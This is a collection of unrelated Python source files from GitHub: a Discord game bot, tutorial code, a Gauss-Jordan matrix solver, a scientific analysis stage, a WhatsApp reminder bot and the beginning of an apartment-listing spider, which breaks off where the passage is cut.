{"seq_id":"25186633340","text":"#Самый крутой бот для игры:D\r\n# -*- coding: utf-8 -*-\r\nimport discord\r\nimport asyncio\r\nimport ctypes\r\nfrom discord.ext import commands\r\nTOKEN = ''\r\nclass MyClient(discord.Client):\r\n    def commands_for_game():\r\n        up = \"Вверх\"\r\n        down = \"Вниз\"\r\n        right = \"Вправо\"\r\n        left = \"Влево\"\r\n        print(f\"up: {up}\\n down: {down}\\n right: {right}\\n left: {left}\")\r\n    async def on_ready(self):\r\n        print('Logged on as {0}!'.format(self.user))\r\n\r\n    async def on_message(self, message):\r\n        print('Message from {0.author}: {0.content}'.format(message))\r\n        comand = message.content\r\n        if(comand == 'right'):\r\n            await message.channel.send(\"вы выбрали идти вправо\")\r\n        if(comand == 'left'):\r\n            await message.channel.send(\"вы выбрали идти налево\")\r\n        if(comand == 'up'):\r\n            await message.channel.send(\"Вы выбрали идти вверх\")\r\n        if(comand == 'down'):\r\n            await message.channel.send(\"Вы выбрали идти вниз\")\r\n        if message.content.startswith(':help'):\r\n            await message.channel.send('Привет,{0.author}, Список доступных команд:'.format(message))\r\n            await message.channel.send('up: вверх\\n down:вниз\\n right: вправо\\n left: налево(кстати не ходим)')\r\nclient = MyClient()\r\nclient.run(TOKEN)\r\n","repo_name":"OnlyM1ss/HeroBot","sub_path":"GetDisCommand.py","file_name":"GetDisCommand.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"70995829683","text":"\r\n#define ClassA\r\nclass Person:\r\n\tID = 0\r\n\tage = 0\r\n\tname = \"\"\r\n\r\n\tdef __init__(myself, ID, age, name): # like constructor\r\n\t\tmyself.ID = ID\r\n\t\tmyself.age = age\r\n\t\tmyself.name = name\r\n\r\n\tdef funInfo(myself): # if using properties of class, func need self parameter\r\n\t\tprint(\"ID: \" + str(myself.ID))\r\n\t\tprint(\"name: \" + str(myself.name))\r\n\t\tprint(\"age: \" + str(myself.age))\r\n\r\n#Using ClassA\r\n\"\"\"\r\nobjClassA1 = ClassA(4,5)\r\nobjClassA2 = ClassA(2,3)\r\nobjClassA1.x1 = 4\r\nobjClassA1.x2 = 6\r\nprint(\"objClassA1: \" +str(objClassA1.funClassA1()))\r\nprint(\"objClassA2: \" +str(objClassA2.funClassA1()))\r\n\"\"\"\r\n\r\nclass Student(Person):\r\n\tMSSV =0\r\n\tclassNum = 0\r\n\tdef __init__(self, ID, age, name, MSSV, classNum):\r\n\t\t#Person.__init__(self, ID, age, name)\r\n\t\tsuper().__init__(ID, age, name)\r\n\t\tself.MSSV = MSSV\r\n\t\tself.classNum = classNum\r\n\r\n\tdef funIntroduce(self): #self\r\n\t\tprint(\"A student MSSV: \" +str(self.MSSV))\r\n\t\tprint(\"A student classNum: \"+str(self.classNum))\r\n\r\nstd1 = Student(1,39, \"Harry\",1413091,1)\r\n\r\nstd1.funIntroduce()\r\nstd1.funInfo()\r\n\r\n\r\n#class Number\r\nclass Numbers:\r\n\tdef __iter__(self):\r\n\t\tself.a = 1\r\n\t\treturn self\r\n\r\n\tdef __next__(self):\r\n\t\tif self.a <= 10:\r\n\t\t\tx = self.a\r\n\t\t\tself.a += 1\r\n\t\t\treturn x\r\n\t\telse:\r\n\t\t\traise StopIteration\r\nclassNum = Numbers()\r\niterNum = iter(classNum) # iter an object\r\n\r\nfor i in iterNum: # it automatically runs through the iterator\r\n\tif i % 3 
== 0:\r\n\t print(i)\r\n\r\n### Example:\r\n## mymodule.py\r\n## In file: work.py. Import file by code:\r\n## `import mymodule`\r\n## Using alias: `import mymodule as md`\r\n## Import only something from mymodule. Code:\r\n## `from mymodule import person1`\r\nimport platform\r\nx = dir(platform)\r\nprint(x)\r\n\r\n\"\"\"\r\n# Module:\r\nplatform\r\ndatetime\r\njson\r\nRegular Expressions => import read\r\n# try except:\r\ntry:\r\nexcept:\r\n\"\"\"\r\n\r\n\"\"\"\r\n#File handling:\r\nw write, create file\r\na append, create file\r\nr read, error if file not exist\r\nx create file, error if file not exist\r\n\r\nt text\r\nb binary\r\n\r\nf = open(\"file.txt\",\"rt\")\r\nf.read()\r\nf.read(5)\r\nf.readline()\r\nf.write() # a, w\r\nf.close()\r\n#remove file:\r\nimport os\r\nif os.path.exists(\"file.txt\"):\r\n\tos.remove(\"file.txt\")\r\nos.rmdir(\"myfolder\")\r\n\r\n\"\"\"","repo_name":"elizabethmy/ProgramingTech","sub_path":"python/w3school_src/ClassObj.py","file_name":"ClassObj.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14385156231","text":"import numpy as np\nfrom fractions import Fraction\nfrom colorama import Fore,Back\nimport os\n\n\n# Declaracion de funciones\n\n\n# Esta funcion sirve para limpiar la consola despues de seleccionar \"Sacar otra matriz\" en cualquier Sistema Operativo\ndef clear():\n if os.name == \"nt\":\n os.system(\"cls\")\n else:\n os.system(\"clear\")\n\n\n\n\ncopy = \"\"\"\n\n <----------------------------------------- ORIGINAL CODE BY BORDERCED ----------------------------------------->\n\n\n\"\"\"\n\nmenu2 = \"\"\"\n\n¡HOLA! Bienvenido a la calculadora de matrices, a continuacion ingresa las filas y columnas de tu sistema de ecuaciones\ncomo en el ejemplo:\n\n Columnas 3\n ↓ ↓ ↓ ↓ ↓ ↓\n → 2x + 3y + 2z = 10 [2, 3, 2 |10] ← \n Filas → 4x - 3y + 4z = 20 --------------> [4, -3,4 |20] ← 3 (3 x 3)\n → 5x + 4y + 5z = 30 [5, 4, 5 |30] ←\n \n\n\n\"\"\"\nmenu = \"\"\"\n\nA continuacion ingresa las constantes que tienes en tu sistema de ecuaciones por ejemplo:\n\n2x + 3y = 10 ------> [2, 3, 10]\n4x - 3y = 20 ------> [4 -3 20]\n\n\"\"\"\n\n# Variables necesarias para los bucles\n\nbucle = 0\nopcion = 0\nbucle2 = 0\nbucle3 = 0\n\n# Programa principal\n\nwhile bucle == 0:\n print(Fore.WHITE + menu2)\n \n while bucle3 == 0: # Bucle para pedir datos con manejo de errores\n \n try:\n filas = int(input(Fore.GREEN + \"Ingrese el número de filas ----> \"))\n columnas = int(input(Fore.RED + \"Ingrese el número de columnas ----> \"))\n except ValueError:\n print(Fore.RED + \"¡SOLO PUEDES INGRESAR NUMEROS!, VUELVE A INTENTARLO...\")\n continue\n \n if(filas != 0 and columnas != 0):\n break\n\n \n print(Fore.LIGHTGREEN_EX + menu)\n\n\n # La Matriz se llena de ceros para luego reeplazarlos por los datos que se ingresan\n\n matriz = np.zeros((filas, columnas+1))\n\n # Se ingresan los datos al array bidimensional con manejo de errores\n\n while bucle3 == 0:\n try:\n for i in range(filas):\n for j in range(columnas):\n elemento = float(input(f\"{Fore.WHITE}Ingresa el elemento en la fila {i+1}, columna {j+1}: \"))\n matriz[i][j] = elemento\n elemento = float(input(f\"Ingresa el resultado en la fila {i+1}: \"))\n matriz[i][columnas] = elemento\n except ValueError:\n print(Fore.RED + \"¡SOLO PUEDES INGRESAR NUMEROS!, VUELVE A INTENTARLO...\")\n i = 0\n j = 0\n continue\n else:\n break\n\n\n # Imprimir la matriz original\n\n print(Fore.LIGHTCYAN_EX + \"\\nMatriz original:\\n\")\n 
print(matriz)\n print(\"\\n\")\n\n\n # Método de Gauss-Jordan\n\n for columna_actual in range(columnas):\n \n if(filas != columnas):\n print(Fore.RED + \"¡SOLO PUEDES INGRESAR MATRICES CUADRADAS (n x n)\\n\")\n break\n\n # Imprimir la matriz\n\n print(f\"//////////////////////////////////////////////////// Matriz en la vuelta {columna_actual+1} ////////////////////////////////////////////////////\")\n print(\"\\n\")\n\n \n\n # Hacer unos en la diagonal\n\n divisor = matriz[columna_actual][columna_actual]\n for j in range(columnas + 1):\n matriz[columna_actual][j] /= divisor # se divide por toda la fila\n\n print(matriz) # Procedimiento\n print(\"\\n\")\n\n\n # ceros debajo del uno\n\n for i in range(columna_actual + 1, filas):\n factor =- matriz[i][columna_actual] / matriz[columna_actual][columna_actual] # se obtiene el numero a multiplicar\n for j in range(columnas + 1):\n if columna_actual == j:\n matriz[i][j] = 0\n else:\n matriz[i][j] += factor * matriz[columna_actual][j]\n\n print(matriz) # Procedimiento\n print(\"\\n\")\n\n\n\n # ceros encima del uno\n\n for i in range(columna_actual):\n factor =- matriz[i][columna_actual] / matriz[columna_actual][columna_actual] # obtenemos el numero a multiplicar\n for j in range(columnas + 1):\n if columna_actual == j:\n matriz[i][j] = 0\n else:\n matriz[i][j] += factor * matriz[columna_actual][j]\n\n\n if (columna_actual == columnas-1):\n MatrizEnCasoDeError = matriz\n\n\n\n print(matriz) # Procedimiento\n print(\"\\n\")\n\n\n \n print(Fore.YELLOW + \"\\n -------------------------------------------------------------------------\")\n\n try:\n\n print(Fore.LIGHTYELLOW_EX + \"\\nMatriz resuelta:\\n\")\n for fila in matriz:\n for elemento in fila:\n if isinstance(elemento, float):\n print(Fraction(elemento).limit_denominator(), end=\" | \")\n else:\n print(elemento, end=\" \")\n print()\n\n except ValueError:\n\n print(Back.RED + \"\\n\" + Fore.WHITE + \"La matriz no tiene solucion o tiene infinitas soluciones\" + Back.RESET + \"\\n\")\n print(MatrizEnCasoDeError)\n\n finally:\n\n print(Fore.YELLOW + \"\\n -------------------------------------------------------------------------\\n\")\n \n\n # Se pide confirmacion si se quiere terminar el programa\n\n\n while bucle2 == 0:\n try:\n opcion = int(input(Fore.LIGHTBLUE_EX + \"¿Quieres sacar otra Matriz? 
(0 si / 1 no)----> \"))\n except ValueError:\n print(Fore.RED + \"¡Solo puedes ingresar numeros!, intentalo nuevamente...\")\n continue\n \n if(opcion == 1):\n bucle = 1\n break\n else:\n clear() # Se limpia la consola y vuelve a pedir los datos para una nueva matriz\n break\n \nprint(Fore.LIGHTGREEN_EX + \"\\n\" + copy + Fore.WHITE)","repo_name":"Borderced/Matrix","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6062,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14156473884","text":"# RotationalUncertaintyStage.py\n# (C)2014-2015\n# Scott Ernst\n\nfrom __future__ import print_function, absolute_import, unicode_literals, division\n\nfrom pyaid.number.NumericUtils import NumericUtils\n\nfrom cadence.analysis.AnalysisStage import AnalysisStage\nfrom cadence.analysis.shared.CsvWriter import CsvWriter\nfrom cadence.analysis.shared.plotting.Histogram import Histogram\nfrom cadence.svg.CadenceDrawing import CadenceDrawing\n\n#*************************************************************************************************** RotationalUncertaintyStage\nclass RotationalUncertaintyStage(AnalysisStage):\n \"\"\"A class for...\"\"\"\n\n#===============================================================================\n# C L A S S\n\n DRAWING_FOLDER_NAME = 'Rotational-Unc-Maps'\n\n#_______________________________________________________________________________\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of RotationalUncertaintyStage.\"\"\"\n super(RotationalUncertaintyStage, self).__init__(\n key, owner,\n label='Rotational Uncertainty',\n **kwargs)\n\n self._uncs = []\n self._largeUncCsv = None\n self._tracks = []\n\n#===============================================================================\n# P R O T E C T E D\n\n#_______________________________________________________________________________\n def _preAnalyze(self):\n self._uncs = []\n self._tracks = []\n\n self.initializeFolder(self.DRAWING_FOLDER_NAME)\n\n csv = CsvWriter()\n csv.path = self.getPath('Large-Rotational-Uncertainties.csv')\n csv.autoIndexFieldName = 'Index'\n csv.addFields(\n ('uid', 'UID'),\n ('fingerprint', 'Fingerprint'),\n ('rotation', 'Rotation') )\n self._largeUncCsv = csv\n\n#_______________________________________________________________________________\n def _analyzeTrack(self, track, series, trackway, sitemap):\n self._tracks.append(track)\n r = track.rotationAngle\n self._uncs.append(r.valueDegrees.uncertainty)\n\n#_______________________________________________________________________________\n def _postAnalyze(self):\n h = Histogram(\n data=self._uncs,\n binCount=80,\n xLimits=(0, max(*self._uncs)),\n color='r',\n title='Distribution of Rotational Uncertainties',\n xLabel='Uncertainty Value (degrees)',\n yLabel='Frequency')\n p1 = h.save(self.getTempFilePath(extension='pdf'))\n\n h.isLog = True\n h.title += ' (log)'\n p2 = h.save(self.getTempFilePath(extension='pdf'))\n\n self.mergePdfs([p1, p2], self.getPath('Rotational-Uncertainty-Distribution.pdf'))\n\n average = NumericUtils.getMeanAndDeviation(self._uncs)\n self.logger.write('Average rotational uncertainty: %s' % average.label)\n\n #-------------------------------------------------------------------------------------------\n # FIND LARGE UNCERTAINTY TRACKS\n largeUncertaintyCount = 0\n drawing = None\n sitemap = None\n\n # If track uncertainty is 2x average, add that track to the spreadsheet and map overlay\n for t in self._tracks:\n\n # 
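The Gauss-Jordan loop earlier divides each pivot row by matriz[columna_actual][columna_actual] without checking for a zero pivot, which is exactly what produces the inf/NaN entries its final try/except has to catch. A hedged sketch of a partial-pivoting guard, illustrative and not part of the original script:

import numpy as np

def normalize_pivot(matriz, c):
    # Swap up the row with the largest |entry| at or below row c, so a zero
    # pivot only survives when the whole column below is zero (singular system).
    p = c + int(np.argmax(np.abs(matriz[c:, c])))
    if np.isclose(matriz[p, c], 0.0):
        raise ZeroDivisionError("no usable pivot in column %d" % c)
    matriz[[c, p]] = matriz[[p, c]]
    matriz[c] /= matriz[c, c]
    return matriz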
if the tracksite has changed, save previous map and make a new one\n            if sitemap != t.trackSeries.trackway.sitemap:\n\n                # save the last site map drawing (if there was one)\n                if drawing:\n                    drawing.save()\n\n                # then start a new drawing for this new site map\n                sitemap = t.trackSeries.trackway.sitemap\n\n                fileName = '%s-%s-ROTATION_UNC.svg' % (sitemap.name, sitemap.level)\n                path = self.getPath(self.DRAWING_FOLDER_NAME, fileName, isFile=True)\n                drawing = CadenceDrawing(path, sitemap)\n\n                # create a group to be instanced for the spreadsheet values\n                drawing.createGroup('rect1')\n                # create a rectangle of 100x100 cm that is to be scaled by fractional meters\n                drawing.rect((0, 0), 100, 100, scene=True, groupId='rect1')\n\n                # create another group to be instanced for the mapped values.\n                drawing.createGroup('rect2')\n                # create a rectangle of 100x100 cm that is to be scaled by fractional meters\n                drawing.rect((0, 0), 100, 100, scene=True, groupId='rect2')\n\n                # and place a grid and the federal coordinates in the drawing file\n                drawing.grid()\n                drawing.federalCoordinates()\n\n            # now examine the rotational uncertainty for this track\n            rotation = t.rotationAngle.valueDegrees\n            if rotation.uncertainty <= 2.0*average.uncertainty:\n\n                # then just indicate that this track has low uncertainty\n                self._drawLowUncertaintyMarker(drawing, t)\n\n                # label this track green\n                # drawing.text(\n                #     t.name,\n                #     (t.x - 20, t.z),\n                #     scene=True,\n                #     stroke='green',\n                #     stroke_width='0.25',\n                #     font_size='8px',\n                #     font_family='Arial')\n                continue\n\n            # else, since the uncertainty is high, first write that track in the spreadsheet\n            largeUncertaintyCount += 1\n            self._largeUncCsv.createRow(\n                uid=t.uid,\n                fingerprint=t.fingerprint,\n                rotation=rotation.label)\n\n            # if either the measured width or length is 0, mark with a yellow disk with red outline\n            if t.rotationMeasured == 0:\n                drawing.circle(\n                    (t.x, t.z),\n                    100*(t.widthUncertainty + t.lengthUncertainty)/2.0,\n                    scene=True,\n                    fill='yellow',\n                    stroke='red')\n\n                # drawing.text(\n                #     t.name,\n                #     (t.x - 20, t.z),\n                #     scene=True,\n                #     stroke='black',\n                #     stroke_width='0.25',\n                #     font_size='6px',\n                #     font_family='Arial')\n                continue\n\n            self._drawHighUncertaintyMarker(drawing, t)\n\n            # label this track with red\n            # drawing.text(\n            #     t.name,\n            #     (t.x - 20, t.z),\n            #     scene=True,\n            #     stroke='red',\n            #     stroke_width='0.25',\n            #     font_size='6px',\n            #     font_family='Arial')\n\n        # and close off with a final save of the drawing file\n        if drawing:\n            drawing.save()\n\n        self.logger.write('%s Tracks with large rotational uncertainties found (%s%%)' % (\n            largeUncertaintyCount, NumericUtils.roundToOrder(\n                100.0*float(largeUncertaintyCount)/float(len(self._tracks)), -1) ))\n\n        self._largeUncCsv.save()\n        self._tracks = []\n\n#_______________________________________________________________________________\n    @classmethod\n    def _drawLowUncertaintyMarker(cls, drawing, track):\n        \"\"\" Indicate a low-uncertainty track at the specified location. The radius scales\n            with the rotational uncertainty. \"\"\"\n\n        rot = track.rotationAngle.valueDegrees\n        drawing.circle(\n            (track.x, track.z),\n            100.0*rot.uncertainty/180.0,\n            scene=True,\n            fill='green',\n            stroke='green')\n\n#_______________________________________________________________________________\n    @classmethod\n    def _drawHighUncertaintyMarker(cls, drawing, track):\n        \"\"\" Indicate a high-uncertainty track at the specified location. 
Radius is average\n uncertainty \"\"\"\n\n rot = track.rotationAngle.valueDegrees\n drawing.circle(\n (track.x, track.z),\n 100.0*rot.uncertainty/180.0,\n scene=True,\n fill='red',\n stroke='red')\n\n","repo_name":"sernst/Cadence","sub_path":"src/cadence/analysis/status/RotationalUncertaintyStage.py","file_name":"RotationalUncertaintyStage.py","file_ext":"py","file_size_in_byte":8229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"7965248045","text":"import json\n\nlatitudes = open('latitudes.txt', 'r', encoding='utf-8').readlines()\nlongitudes = open('longitudes.txt', 'r', encoding='utf-8').readlines()\nnames = open('names.txt', 'r', encoding='utf-8').readlines()\nphone_numbers = open('phone_numbers.txt', 'r', encoding='utf-8').readlines()\n\nliste = []\n\nfor i in range(141):\n dictionary: dict[str, str] = {\n \"id\": 1000 + i,\n \"name\": names[i].strip(),\n \"phone_number\": phone_numbers[i].strip(),\n \"latitude\": latitudes[i].strip(),\n \"longitude\": longitudes[i].strip(),\n }\n\n liste.append(dictionary)\n\n\njson_data = json.dumps(liste, indent=None, ensure_ascii=False)\nfile = open(\"station_data.json\", 'x', encoding='utf-8')\nfile.write(json_data)\nfile.close()","repo_name":"yigiitd/BursaTaksi","sub_path":"data/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33349309154","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 17 10:01:26 2021\r\n\r\n__Version__: 0.0.3\r\n\r\n__Release__: 17/05/2021\r\n\r\n@author: Arthur Chabole\r\n====================================================================\r\nEQUIPE ZEBRA AERODESIGN 2021 - ZEBRINHA AGIOTA\r\n=====================================================================\r\nPassos para usar a zebrinha agiota\r\n0. Esteja com o pacote anaconda instalado https://www.anaconda.com/products/individual\r\n1. Instale o chrome driver https://sites.google.com/a/chromium.org/chromedriver/downloads\r\n2. 
Instale ou verifique se as bibliotecas selenium e BeautilfulSoup\r\n 2.1 Caso não esteja instalado vá no console do python e digite\r\n 2.2 pip install selenium (precione enter e espere instalar)\r\n 2.3 pip install BeautilfulSoup (precione enter e espere instalar)\r\n\r\n\"\"\"\r\n\r\nimport selenium \r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nimport time\r\nimport pandas as pd\r\nimport requests\r\nfrom bs4 import BeautifulSoup \r\n\r\nclass Zebrinha:\r\n \r\n #Colocar os XPATH aqui (selenium)\r\n Barra_pesquisa = '//*[@id=\"side\"]/div[1]/div/label/div/div[2]'\r\n Barra_mensagem = '//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]'\r\n Barra_grupo = '//*[@id=\"main\"]/header/div[2]/div[1]/div/span'\r\n Barra_docs = \"kia3R _2wzbH\"\r\n Botão_docs = \"_2-q8E _2Rdwt\"\r\n Botão_mais = '//*[@id=\"app\"]/div[1]/div[1]/div[2]/div[3]/span/div[1]/span/div[1]/div/section/div[5]/div[5]/div[2]/div/div'\r\n Botão_reporte = '//*[@id=\"app\"]/div[1]/div[1]/div[2]/div[3]/span/div[1]/span/div[1]/div/section/div[7]/div/div[2]'\r\n Botão_cancel = '//*[@id=\"app\"]/div[1]/span[2]/div[1]/div/div/div/div/div/div[2]/div[1]/div/div'\r\n Arquivo = '//*[@id=\"app\"]/div[1]/div[1]/div[2]/div[3]/span/div[1]/span/div[1]/div[2]/span/div/div/div/div/div[1]/div/div/div/div'\r\n \r\n #Nome das classes aqui (BeautifulSoup )\r\n #Campo_grupo = \"_1Flk2 _3xysY\"\r\n Campo_grupo = \"JnmQF _3QmOg\"\r\n Bloco_contato = \"_2aBzC\"\r\n Nome_contato = \"_35k-1 _1adfa _3-8er\"\r\n \r\n def __init__(self, PATH_driver, mes):\r\n self.PATH = PATH_driver\r\n self.driver = webdriver.Chrome(self.PATH)\r\n self.driver.maximize_window()\r\n self.driver.get('https://web.whatsapp.com')\r\n self.mes = mes\r\n \r\n def __buscarContatos__(self, contato):\r\n \r\n search = WebDriverWait(self.driver, 30).until(\r\n EC.presence_of_element_located((By.XPATH, Zebrinha.Barra_pesquisa)))\r\n \r\n actions = ActionChains(self.driver)\r\n actions.click(search)\r\n search.clear()\r\n actions.send_keys_to_element(search, self.contato)\r\n actions.send_keys_to_element(search, Keys.ENTER)\r\n \r\n actions.perform()\r\n \r\n def __enviarMensagem__(self):\r\n \r\n texto = self.driver.find_element_by_xpath(Zebrinha.Barra_mensagem)\r\n \r\n actions1 = ActionChains(self.driver)\r\n texto.clear()\r\n actions1.send_keys_to_element(texto, self.definir_Mensagem())\r\n actions1.send_keys_to_element(texto, Keys.ENTER)\r\n \r\n actions1.perform()\r\n\r\n def fechar(self):\r\n self.driver.close()\r\n try:\r\n print(f'Envio feito para {self.num} contatos realizado com sucesso! ;)')\r\n print(f'Volte sempre att: Zebrinha')\r\n except:\r\n print(f'Terminei a tarefa! seu computador está disponível agora ...')\r\n print(f'Volte sempre att: Zebrinha')\r\n\r\n #Esta com problema em encontrar grupos com mais de 20 contatos\r\n def buscarContatos_byGroup(self, Nome_Grupo, grupo_Grande=False):\r\n \r\n '''\r\n \r\n Encontra os nomes dos contatos que participam do grupo. 
\r\n Ainda estamos trabalhando em soluções para grupos com mais de 20 pessoas.\r\n Caso queira testar a funcionalidade alpha grupo_grande=True.\r\n \r\n Parameters\r\n ----------\r\n Nome_Grupo : string\r\n Nome do grupo que deseja pesquisar as pessoas.\r\n grupo_Grande: boolean\r\n Tenta achar contatos com grupos com de mais 20 pessoas.\r\n\r\n Returns\r\n -------\r\n pessoas_grupo : Lista\r\n Nome dos contatos que participam do grupo.\r\n\r\n '''\r\n \r\n search = WebDriverWait(self.driver, 30).until(\r\n EC.presence_of_element_located((By.XPATH, Zebrinha.Barra_pesquisa)))\r\n search.click()\r\n search.clear()\r\n search.send_keys(Nome_Grupo)\r\n search.send_keys(Keys.ENTER)\r\n \r\n ID_grupo = self.driver.find_element_by_xpath(Zebrinha.Barra_grupo)\r\n ID_grupo.click()\r\n \r\n try:\r\n #Espera a barra da ação aparecer e clica no ativo.\r\n more = WebDriverWait(self.driver, 1).until(\r\n EC.presence_of_element_located((By.XPATH, Zebrinha.Botão_mais)))\r\n more.click()\r\n print('Consegui acessar mais contatos! :)')\r\n except:\r\n print('Não consegui acessar mais contatos! :(')\r\n \r\n html = self.driver.page_source\r\n soup = BeautifulSoup(html, 'html.parser')\r\n \r\n contat_grupo = soup.find(class_= Zebrinha.Campo_grupo)\r\n blocos = contat_grupo.find_all(class_= Zebrinha.Bloco_contato)\r\n \r\n pessoas_grupo = []\r\n for bloco in blocos:\r\n pessoas_grupo.append((bloco.find(class_= Zebrinha.Nome_contato).text))\r\n \r\n if grupo_Grande:\r\n Reportar = self.driver.find_element_by_xpath(Zebrinha.Botão_reporte)\r\n Reportar.click()\r\n \r\n Cancelar = self.driver.find_element_by_xpath(Zebrinha.Botão_cancel)\r\n Cancelar.click()\r\n \r\n #Recarregar a página p/ aparecer os contatos\r\n html = self.driver.page_source\r\n soup = BeautifulSoup(html, 'html.parser')\r\n \r\n contat_grupo = soup.find(class_= Zebrinha.Campo_grupo)\r\n blocos = contat_grupo.find_all(class_= Zebrinha.Bloco_contato)\r\n \r\n for bloco in blocos:\r\n pessoas_grupo.append((bloco.find(class_= Zebrinha.Nome_contato).text))\r\n \r\n try:\r\n pessoas_grupo.remove('You')\r\n except:\r\n pass\r\n \r\n pessoas_grupo = sorted(pessoas_grupo) \r\n pessoas_grupo = pd.DataFrame(data=pessoas_grupo)\r\n pessoas_grupo = pessoas_grupo.drop_duplicates()\r\n \r\n return pessoas_grupo\r\n \r\n #O Google esta atualmente me bloqueando!\r\n def buscar_Docs(self, contatos):\r\n \r\n for self.contato in contatos:\r\n search = WebDriverWait(self.driver, 30).until(\r\n EC.presence_of_element_located((By.XPATH, Zebrinha.Barra_pesquisa)))\r\n \r\n search.click()\r\n search.clear()\r\n \r\n search.send_keys(self.contato)\r\n search.send_keys(Keys.ENTER)\r\n \r\n Barra_contato = self.driver.find_element_by_xpath(Zebrinha.Barra_grupo)\r\n Barra_contato.click()\r\n \r\n #Problema aqui: NOT LOCATED\r\n try:\r\n click_Docs = WebDriverWait(self.driver, 2).until(\r\n EC.presence_of_element_located((By.CLASS_NAME, Zebrinha.Barra_docs)))\r\n click_Docs.click()\r\n except:\r\n pass\r\n \r\n Docs = self.driver.find_element_by_class_name(Zebrinha.Botão_docs)\r\n Docs.click()\r\n \r\n try:\r\n Baixar_documento = WebDriverWait(self.driver, 2).until(\r\n EC.presence_of_element_located((By.XPATH, Zebrinha.Arquivo)))\r\n Baixar_documento.click()\r\n Baixar_documento.send_keys(Keys.ENTER)\r\n except:\r\n pass\r\n \r\n def enviar_Msg_fromExcel(self, posição_seuNome, local_excel, Preencher_NaN=True):\r\n '''\r\n Envia mensagem para os cantatos e utilizando informações contidas em um arquivo excel. 
\r\n Definida no método definir_Mensagem para a lista de contatos.\r\n\r\n Parameters\r\n ----------\r\n posição_seuNome : int\r\n Posição de onde esta seu nome no arquivo.\r\n local_excel : PATH\r\n Local onde esta com final '.xlsx'. Exemplo: 'D:/UNESP/Dados/caixinha.xlsx'.\r\n Preencher_NaN : Boolean, optional\r\n Completar as células vázias com 'não pago'. The default is True.\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n '''\r\n tabela = pd.read_excel(local_excel)\r\n tabela = tabela.replace('pago ', 'pagou') # ERRO: 'pago' verificar com financeiro\r\n tabela = tabela.drop(posição_seuNome)\r\n \r\n if Preencher_NaN:\r\n tabela = tabela.fillna('não pagou')\r\n \r\n self.num = 0 \r\n for self.contato, self.situação in zip(tabela['Nome'], tabela[self.mes]):\r\n self.__buscarContatos__(self.contato)\r\n self.__enviarMensagem__()\r\n self.num += 1\r\n \r\n def enviar_Msg_fromlista(self, Lista_contatos):\r\n '''\r\n Envia mensagem definida no método definir_Mensagem para a lista de contatos.\r\n \r\n Parameters\r\n ----------\r\n Lista_contatos : Lista ou array\r\n Coloque a lista de contatos que deseja enviar \r\n as mensagens. Ex: contatos = ['Arthur', 'Rafael', 'Rebeca']. Importante \r\n colocar '[ ... ]'.\r\n\r\n Returns\r\n -------\r\n None.\r\n '''\r\n self.num = 0 \r\n for self.contato in Lista_contatos:\r\n self.__buscarContatos__(self.contato)\r\n self.__enviarMensagem__()\r\n self.num += 1\r\n \r\n def definir_Mensagem(self):\r\n return f''' \r\n \r\n Olá, {self.contato} vc {self.situação} o mês de {self.mes} att: Zebrinha agiota\r\n ;)\r\n \r\n \r\n '''\r\n\r\n#------------------------ PROGRAME AQUI - EXPLEMPLO DE CÓDIGO -----------------------\r\n\r\nPATH = 'C:/Users/arthu/Downloads/chromedriver_win32/chromedriver.exe' \r\n \r\nZb = Zebrinha(PATH, 'Janeiro')\r\nLocal = 'D:/UNESP/AeroDesign/Códigos_Python/Dados/caixa_teste.xlsx'\r\nZb.enviar_Msg_fromExcel(1, Local, True)\r\nZb.fechar()\r\n\r\n","repo_name":"Zebra-Aerodesign/Python","sub_path":"Automação/Zebrinha_agiota.py","file_name":"Zebrinha_agiota.py","file_ext":"py","file_size_in_byte":10536,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"26748490464","text":"# -*- coding: utf-8 -*-\n\"\"\"Furnished apartments from City Wohnen.\"\"\"\nimport re\nfrom datetime import datetime\nfrom typing import Any, Dict\nfrom urllib.parse import unquote_plus\n\nimport requests\nfrom scrapy import Request\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.loader import ItemLoader\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom w3lib.url import url_query_cleaner\n\nfrom tegenaria.items import ApartmentItem\nfrom tegenaria.spiders import SpiderMixin\n\n\nclass CityWohnenSpider(CrawlSpider, SpiderMixin):\n \"\"\"Furnished apartments from City Wohnen.\"\"\"\n\n name = \"city_wohnen\"\n allowed_domains = [\"city-wohnen.de\"]\n\n MAX_RECORDS = 300\n start_urls = (\n # This link shows an empty page...\n # 'https://www.city-wohnen.de/eng/berlin/furnished-flats/flat-search/'\n # ... 
because the actual results are loaded by an AJAX call.\n \"https://www.city-wohnen.de/rpc.php?pageid=401&action=services&service=ciwo_search&cmd=search&\"\n \"filters=city%3Dberlin%26date_from%3D%26room_count%3D1%26rent_amount_min%3D0%26rent_amount_max%3D4375%26\"\n \"person_count%3D1&order=available_from&page_nr=1&page_size={}\".format(MAX_RECORDS),\n )\n\n URL_REGEX = r\"/eng/berlin/[0-9]+[a-z-]+\"\n rules = (Rule(LinkExtractor(allow=URL_REGEX, process_value=url_query_cleaner), callback=\"parse_item\", follow=True),)\n\n field_regex = {\n \"availability\": re.compile(r\".*from (?P[0-9/]+).*\", re.MULTILINE),\n \"neighborhood\": re.compile(r\"furnished apartment in Berlin-(?P.+)\"),\n \"address\": re.compile(r\".+/maps/search/(?P
